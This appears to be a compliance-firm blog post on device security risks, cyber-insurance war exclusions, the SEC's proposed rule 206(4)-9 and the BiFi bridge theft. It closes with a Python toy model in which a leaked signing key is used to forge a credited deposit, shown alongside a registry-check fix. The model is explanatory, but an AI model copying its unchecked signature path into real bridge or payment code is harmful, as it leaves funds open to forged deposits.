4. Lost or stolen devices

The best-case situation is that a worker’s device gets stolen or goes missing, and this is inconvenient. In the worst-case scenario, you’re dealing with a catastrophic disaster. Loss or theft of the employee’s device might result in a major breach if they weren’t following corporate security standards when using it. For example, the employee may store their passwords (both personal and business) in an unsecured notes program, making it easy for someone who obtains the device to breach corporate accounts.

Even if the employee followed the policy to the letter, hacking/cracking technology has advanced so much in recent years that a strong password or fingerprint verification may not be enough to keep them out of the device. Mobile device management (MDM) software might help businesses solve this issue by allowing them to remotely erase devices so hackers don’t have a chance to steal sensitive data. On the other hand, MDM software is extremely invasive to an employee’s privacy (see #8).

5. Improper mobile management

A staff member leaving an organization creates a potential security vulnerability if they still have access to company data on their personal mobile devices. To prevent an employee from continuing to access systems or apps after they leave the company, companies must be able to reset passwords and revoke access immediately. If a security breach does occur, tracking down the device responsible should also be possible. If you just fired an employee, do you think they would be willing to cooperate? Hell no.

6. Insufficient employee training

Many security breaches are caused by carelessness or human error. Most of the time, this occurs when an employee is unaware of their company’s policy on security, especially regarding devices. When you’re training employees in device security, think about the best way to communicate the information to them. If you need a training program, I highly recommend you check out a free training program called FieldCraft. It is compliant with SEC and FINRA regulations and we offer a no BS-attached free version available to firms with less than 10 employees.

7. Shadow IT

Shadow IT is where company employees use technology that is not approved or managed by the company’s IT department, and it is becoming a big problem in many businesses. When employees bring in consumer-grade technologies and goods without the supervision or management of their IT department or MSP, a slew of issues can result. Any software or hardware an employee introduces without your review or approval poses a potential hazard, whether it’s a USB drive with potential malware on it or an open-source program with low-security standards.

8. Invasion of Privacy

If you are an SEC-registered business, you must keep track and record all communications with clients. If you allow your employees to text message your clients, you must monitor all of their text message conversations. There is no automated method for telling whether an employee’s text message communication is intended for a friend or family member vs a client. As a result, you must keep track of them all. No, thanks.

Your Cybersecurity Insurance is Absolutely Worthless…and it will get worse.

To be clear, I am not trying to sell you a policy. I don’t sell policies. And, I don’t have a recommendation for a policy. I don’t have a solution for you because every policy I have seen is worthless.

Which is why I always say….

“Your cybersecurity insurance policy is absolutely worthless, but I would never want to go through an SEC audit or examination without one”.

This is a line I have been toeing for years. I have covered the topic in several webinars. A recording of the latest is below.

Now, it is going to get worse…

Starting 31 March 2023, insurance companies will require all standalone cyber attack policies to include a clause excluding liability for losses arising from state-backed cyber attacks. This is in addition to the “war” clause that already exists and is so problematic.

The new clause will exclude any losses due to a war–declared or not–even if the policy has a separate war exclusion. In addition, it must also exclude any losses arising from state-sponsored cyberattacks that disable a firm’s ability to function properly.

Furthermore, the contracts will now have a stipulation on whether cover excludes IT systems not located in the country “under attack”, and it should set a clear standard for how the involved parties will reach an agreement if any state-sponsored cyberattack originates from one or more countries.

The evolving risk of cyber-related business was noted by one firm, Lloyd’s. They warn that if not managed properly, it could lead to significant losses for syndicates that would be difficult to recover from.

“The ability of hostile actors to easily disseminate an attack, the ability for harmful code to spread, and the critical dependency that societies have on their IT infrastructure, including to operate physical assets, means that losses have the potential to greatly exceed what the insurance market is able to absorb,” Lloyd’s added.

MTradecraft agrees. Especially considering that a large majority of FinTech providers have little to no cybersecurity budget.

Lloyd’s stated that it is aware many managing agents already have clauses specifically excluding war and non-war state-sponsored cyber-attacks, but they need to be of a high standard with solid wordings.

“We consider the complexities that can arise from cyber-attack exposures in the context of war or non-war, state-backed attacks means that underwriters should ensure that their wordings are legally reviewed to ensure they are sufficiently robust,” said Lloyd’s.

Starting March 31, 2023, this new requirement will go into effect for every policy–both at its inception and renewal. Note that this coincides with the SEC’s new cyber regulations known as 206(4)-9.

So again, please understand your cybersecurity policy is worthless. Unfortunately, the SEC and your clients expect you to have coverage.

Your only defense is to do your required cyber audits (SEC 206(4)-9) so that you patch systems, plug open ports, train your employees, and manage your vulnerabilities before they are discovered by malicious hackers…or your insurance company.

An Overview of the SEC’s New Cybersecurity Regulation

In March, the Securities and Exchange Commission (SEC) proposed new cybersecurity risk management rules for organizations including registered investment advisers, registered investment companies, and business development companies (registered funds).

The SEC is also proposing numerous modifications to existing rules governing investment adviser and registered fund disclosures.

This 200+ page rule is dedicated to strengthening existing standards and encouraging firms to upgrade their cybersecurity risk management procedures. Cybersecurity has been at the forefront of the SEC’s examinations and we can expect that focus to increase now that the new regulation (known as 206(4)-9) will move us from a period of cybersecurity “guidance” to a period of cybersecurity “regulation”.

I have covered this topic in a past webinar. If you prefer a recorded version of this information, I highly encourage you to check out the YouTube link below.

Here is the YouTube link.

How does this affect your firm?

According to the accompanying Cybersecurity Risk Management Fact Sheet released by the SEC (Link Here) the planned regulation would have a significant impact on registrants’ cybersecurity measures in a number of key areas.

The New SEC Cybersecurity Regulations will Require: 

  • You will now be required to implement written cybersecurity policies and procedures that are designed to address cybersecurity risks, including the risks of using interconnected systems and networks directly and through IT vendors, cloud providers, and MSPs.
  • You are now required to perform vulnerability scans and penetration tests.
  • Firms will now be required to maintain records related to cybersecurity programs and their outcomes, as well as data breaches and system logs.
  • Firms will now have to disclose cybersecurity risks and incidents to the adviser’s clients and prospective clients. (See our webinar on why this is a disastrous and dangerous requirement.)
  • Registered advisers will now be required to report significant cybersecurity incidents to the SEC and file Form ADV-C.

The new cybersecurity risk management and recordkeeping rules would be put in place under the Investment Advisers Act of 1940 (“Advisers Act”) and the Investment Company Act of 1940 (“Investment Company Act”), which already require registered advisers and funds to evaluate certain cybersecurity risks while developing policies and procedures.

To summarize, organizations will be forced to take additional proactive steps that will undoubtedly increase the burden and costs of their compliance workflows with registrants required to examine the design and efficacy of their cybersecurity measures on an annual basis and produce a written report as a result of those audits.

I will go through some of the most important aspects of the SEC’s new proposed rule below.

Cybersecurity Risk Management Rules

All registered advisers and funds must “adopt and implement written policies and procedures that are reasonably designed to address cybersecurity risks” under rules 206(4)-9 of the Advisers Act and 38a-2 of the Investment Company Act, according to the SEC.

Given the ever-changing nature of threats, the SEC feels that the proposed cybersecurity regulation would be adaptable, allowing companies to tailor their security efforts based on their particular operations and complexity, as well as changing cybersecurity risks.

The proposed rule addresses several crucial aspects of a cybersecurity strategy:

  • Risk and threat assessments: requires registered advisers and funds to conduct periodic risk assessments of the network’s vulnerabilities, as well as of service providers that have been granted access to the network.
  • User security and access: requires evidence of minimizing user-related risks and preventing unlawful access to the network by mandating policies that follow existing cybersecurity standards.
  • Information protection: firms would be required to assess the sensitivity of data on their network and actively monitor IT systems to identify suspicious activity.
  • Threat and vulnerability management: the new risk management rule would require registered advisers and funds to monitor their systems and industry or government cyber threat information so that they can detect, mitigate, and remediate cybersecurity hazards and vulnerabilities.
  • Cybersecurity incident response: firms will need to have procedures in place to identify, react to, and recover from a cyber-related disruption.

Interested in seeing the technical/nerdy aspects of how you or your IT firm will have to deal with these requirements?

I cover that topic in this YouTube video.

Reporting of Significant Cybersecurity Incidents to the SEC

The SEC is proposing a new regulation that would require advisers to provide confidential information on Form ADV-C “promptly but not more than 48 hours” after establishing a reasonable basis to believe that a significant adviser cybersecurity problem or a significant fund cyber incident has occurred or is occurring. This is EXTREMELY problematic for reasons that we have covered extensively in videos and other write-ups.

Additionally, the proposed rule would also require registered advisers to amend any previously filed Form ADV-C promptly, “but in no event more than 48 hours, after information reported on the form becomes materially inaccurate; if new material information about a previously reported incident is discovered; and after resolving a previously reported incident or closing an internal investigation about a previously disclosed incident.”

This timeline for breach reporting to the SEC under the proposed rule would be one of the strictest in the industry when compared with other reporting regimes, and I can tell you from years of doing this kind of work that the timeline is completely unrealistic.

Annual Review

On an annual basis, firms would have to reevaluate their cybersecurity policies and procedures. They would then need to generate a written report documenting security assessments, recording security incidents, and discussing any policy changes (that are material) since the last report.

New Record Keeping Requirements

The new rule will introduce further record-keeping obligations in the form of maintaining five years of cybersecurity policies, annual written cybersecurity audits, risk assessments, breach notification notices, and records documenting “any cybersecurity incidents”. This is going to be extremely expensive and a barrier to entry for many firms.

Disclosure of Cybersecurity Risks and Incidents

The proposed changes would add a new Item 20, “Cybersecurity Risks and Incidents,” to the Form ADV Part 2A... which is made available to the public!

Scary. I know.

Does your firm need help to understand the new regulations?

MTradecraft can help.

Hacker Tales: How Did BiFi get BuFu’d out of $2.25MM?

Let’s discuss BiFi.

A few weeks ago, an attack was launched against BIFROST’s BiFi service. The hacker was able to steal 1,852 ETH ($2.25 million) from the project by exploiting a security hole in the service’s address management system.

If you are going to dabble in ponzi schemes, you better know what the hell you are doing because there is always a better scammer. Here is how one such better scammer took advantage of the flaw:

BIFROST is a cross-blockchain bridge that requires a mechanism for monitoring deposits on one blockchain to allow withdrawals on another.

When a user deposits Bitcoin into the service, the address issuing server generates and digitally signs an address for that person. The address is then accepted and functional on the BiFi platform after this digital signature is verified. The user may then deposit money to that address and transfer assets across the cross-chain bridge.

This method relies on the address issuing server’s private key, which is then used to generate these digital signatures. The attacker was able to gain access to this key, allowing them to produce a genuine digital signature for a deposit address of their choosing.

When the hacker sent bitcoin to their deposit address, the BiFi service interpreted it as a deposit into the service. This gave the attacker a fake balance in BiFi that allowed them to drain the coffers with bogus withdrawals. Because the deposit address was under the control of the attacker, they were able to keep the phony BTC deposit as well.
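To make the failure concrete, here is a constructed model of the deposit-address flow described above (added here, not BiFi's or BIFROST's code). HMAC-SHA256 stands in for the issuing server's digital signature, the address derivation and the registry cross-check are assumptions, and the amounts are made up; the point it shows is that a signature check alone accepts any address signed with a leaked key, while a cross-check against the server's own record of issued addresses does not.

```python
import hashlib
import hmac
import secrets

# Constructed model, not BiFi's code. HMAC-SHA256 stands in for the server's
# digital signature: the property that matters is the same, anyone holding the
# key can produce a valid tag for any address they choose.
SIGNING_KEY = secrets.token_bytes(32)


def sign_address(key: bytes, address: str) -> str:
    """Tag the address-issuing server attaches to a deposit address."""
    return hmac.new(key, address.encode(), hashlib.sha256).hexdigest()


def issue_address(key: bytes, user_id: str, registry: set) -> tuple:
    """Server side: derive an address for the user, record it, and sign it."""
    # Hypothetical derivation; a real service would use custody-controlled keys.
    address = "bc1q" + hashlib.sha256(b"issuer-salt" + user_id.encode()).hexdigest()[:38]
    registry.add(address)  # authoritative record of what the server handed out
    return address, sign_address(key, address)


def credit_deposit(key, registry, balances, address, signature, amount, check_registry):
    """Bridge side: decide whether a BTC deposit to `address` earns a balance."""
    # Signature check alone: passes for any address signed with the key, leaked or not.
    if not hmac.compare_digest(sign_address(key, address), signature):
        return False
    # Mitigation: a valid signature is not proof the server issued this address,
    # so cross-check the server's own registry before crediting anything.
    if check_registry and address not in registry:
        return False
    balances[address] = balances.get(address, 0) + amount
    return True


def run_scenario(check_registry: bool) -> dict:
    """Legitimate deposit, then a key-compromise case; constructed amounts."""
    registry, balances = set(), {}
    user_addr, user_sig = issue_address(SIGNING_KEY, "alice", registry)
    legit = credit_deposit(SIGNING_KEY, registry, balances, user_addr, user_sig, 5, check_registry)
    # Key-compromise case: the leaked key signs an address the server never issued.
    rogue_addr = "bc1q" + "f" * 38
    rogue_sig = sign_address(SIGNING_KEY, rogue_addr)
    forged = credit_deposit(SIGNING_KEY, registry, balances, rogue_addr, rogue_sig, 1852, check_registry)
    return {"legit_credited": legit, "forged_credited": forged, "balances": balances}
```

With `check_registry=False` both deposits are credited and the bridge now carries a balance it never actually received; with `check_registry=True` only the issued address is credited.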